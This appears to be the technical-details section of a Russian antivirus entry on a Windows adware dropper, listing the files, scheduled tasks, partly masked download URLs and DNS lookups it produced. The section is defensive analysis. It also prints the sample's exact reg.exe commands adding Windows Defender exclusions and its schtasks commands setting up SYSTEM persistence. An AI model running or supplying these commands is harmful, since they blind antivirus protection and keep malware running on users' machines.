Техническая информация
- %WINDIR%\tasks\bkufstjbuutyfcjqwrb.job
- <SYSTEM32>\tasks\bkufstjbuutyfcjqwrb
- <SYSTEM32>\tasks\gpuitlesuwc
- %WINDIR%\tasks\tguvahoyffeujok.job
- <SYSTEM32>\tasks\tguvahoyffeujok
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\MOllJLwzCfYCLyeZ' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\vvgJrSSSjHqbqVVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\vvgJrSSSjHqbqVVB' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\vvgJrSSSjHqbqVVB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\vvgJrSSSjHqbqVVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\qVEJSLhWuomPa' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\qVEJSLhWuomPa' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\qVEJSLhWuomPa' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\qVEJSLhWuomPa' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\jGeKjoqnxszCGslur' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OWSSrnicdgUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\jGeKjoqnxszCGslur' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\jGeKjoqnxszCGslur' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BeivXVoZU' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\DpxdYUHugxkU2' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OWSSrnicdgUn' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eTvJFEwqSVAUC' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jTOLnVBblIE' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\vvgJrSSSjHqbqVVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\qVEJSLhWuomPa' = '0'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jTOLnVBblIE' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jTOLnVBblIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jTOLnVBblIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\jTOLnVBblIE' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eTvJFEwqSVAUC' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\MOllJLwzCfYCLyeZ' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\MOllJLwzCfYCLyeZ' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BeivXVoZU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BeivXVoZU' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BeivXVoZU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BeivXVoZU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\DpxdYUHugxkU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\DpxdYUHugxkU2' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\DpxdYUHugxkU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\jGeKjoqnxszCGslur' = '0'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\jGeKjoqnxszCGslur' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\DpxdYUHugxkU2' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OWSSrnicdgUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OWSSrnicdgUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eTvJFEwqSVAUC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eTvJFEwqSVAUC' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\eTvJFEwqSVAUC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\MOllJLwzCfYCLyeZ' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\OWSSrnicdgUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\MOllJLwzCfYCLyeZ' = '0'
- '' (загружен из сети Интернет)
- iexplore.exe
- firefox.exe
- %TEMP%\nmgewiakjaoq.exe
- %WINDIR%\temp\molljlwzcfyclyez\eixlplqmvhnvdnzf.vbs
- %TEMP%\jgekjoqnxszcgslur\ihmgrhrmkqynnnne\teknggyjdlhszosv.exe
- %ProgramFiles(x86)%\beivxvozu\tcfqau.dll
- %APPDATA%\mozilla\firefox\profiles\gn7ryp3k.default\prefs.js_tempdvmdxv
- %ProgramFiles(x86)%\mozilla firefox\browser\features\{a1efe025-cad9-470d-a1f1-d9909699c5d5}.xpi
- %WINDIR%\temp\molljlwzcfyclyez\eixlplqmvhnvdnzf.vbs
- <SYSTEM32>\tasks\gpuitlesuwc
- %WINDIR%\tasks\bkufstjbuutyfcjqwrb.job
- <SYSTEM32>\tasks\bkufstjbuutyfcjqwrb
- %APPDATA%\mozilla\firefox\profiles\gn7ryp3k.default\prefs.js_tempdvmdxv
- %PROGRAMDATA%\ntuser.pol
- %PROGRAMDATA%\tempntuser.pol
- http://ip##pi.com/xml
- http://os##oft.com/20190118/things.xml
- http://fi####aring247.pw/nmgewiakjaoq.exe
- http://go#####analytics.com/collect
- DNS ASK ip##pi.com
- DNS ASK go#####analytics.com
- DNS ASK os##oft.com
- DNS ASK li#####.##-us-west-2.amazonaws.com
- DNS ASK fi####aring247.pw
- '%TEMP%\nmgewiakjaoq.exe' /S /kr /site_id=724
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\MOllJLwzCfYCLyeZ\EixLPlQMVHNvdnzf.vbs"
- '%TEMP%\jgekjoqnxszcgslur\ihmgrhrmkqynnnne\teknggyjdlhszosv.exe' /S /kr /site_id=724 /spi /adp ZRHCB5KSHCB7HRHCB2HQHCB5VRHCB8GRHCB1GRHCB2NSHCB4UQHCB5ZRHCB4OQHCB4NRHCB0ISHCB7OSHCB4LSHCB9PQHCB7
- '%TEMP%\nmgewiakjaoq.exe' /comm we /adp OQHCB2LSHCB1ASHCB2CRHCB0LRHCB4OQHCB4QQHCB6MRHCB8LQHCB3GQHCB2LRHCB1PRHCB4PSHCB8JSHCB8JRHCB0KSHCB4RQHCB8
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\DpxdYUHugxkU2" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%TEMP%\nmgewiakjaoq.exe' /comm we /adp OQHCB2LSHCB1ASHCB2CRHCB0LRHCB4OQHCB4QQHCB6MRHCB8LQHCB3GQHCB2LRHCB1PRHCB4PSHCB8JSHCB8JRHCB0KSHCB4RQHCB8' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\dhSebCetEbdRqsxofFR" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OWSSrnicdgUn" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:32' (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:64' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "bkuFStjBuuTyFcJQWRb" /SC once /ST 03:59:45 /V1 /F /RU "SYSTEM" /TR "\"%TEMP%\nmgewiakjaoq.exe\" /comm we /adp OQHCB2LSHCB1ASHCB2CRHCB0LRHCB4OQHCB4QQHCB6MRHCB8LQHCB3GQHCB2LRHCB1PRHC...
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\vvgJrSSSjHqbqVVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\qVEJSLhWuomPa" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\jGeKjoqnxszCGslur" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gpuiTLEsUwc" /SC once /ST 11:40:10 /F /RU "user" /TR "rundll32 Userenv.dll,RefreshPolicy 1"
- '%WINDIR%\syswow64\schtasks.exe' /run /tn "gpuiTLEsUwc"
- '<SYSTEM32>\taskeng.exe' {6FBBEE04-0C4B-4B5E-AC83-768C5F00FD78} S-1-5-21-1960123792-2022915161-3775307078-1001:lcnuvmuaxejj\user:Interactive:[1]
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "gpuiTLEsUwc" /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "bkuFStjBuuTyFcJQWRb"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "bkuFStjBuuTyFcJQWRb" /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "tguVaHoYFFEUJok"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "tguVaHoYFFEUJok" /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "tguVaHoYFFEUJok2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "tguVaHoYFFEUJok2" /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "kOuoHndzUhHiWe"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "kOuoHndzUhHiWe" /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "uGtvNyZLJMlZa"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "uGtvNyZLJMlZa" /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "uGtvNyZLJMlZa2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /TN "uGtvNyZLJMlZa2" /F
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\BeivXVoZU\TcfQau.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tguVaHoYFFEUJok" /V1 /F
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\jTOLnVBblIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\eTvJFEwqSVAUC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /run /tn "bkuFStjBuuTyFcJQWRb"
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C mkdir "%WINDIR%\Temp\MOllJLwzCfYCLyeZ" && copy nul "%WINDIR%\Temp\MOllJLwzCfYCLyeZ\EixLPlQMVHNvdnzf.vbs"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BeivXVoZU" /t REG_DWORD /d 0 /reg:64
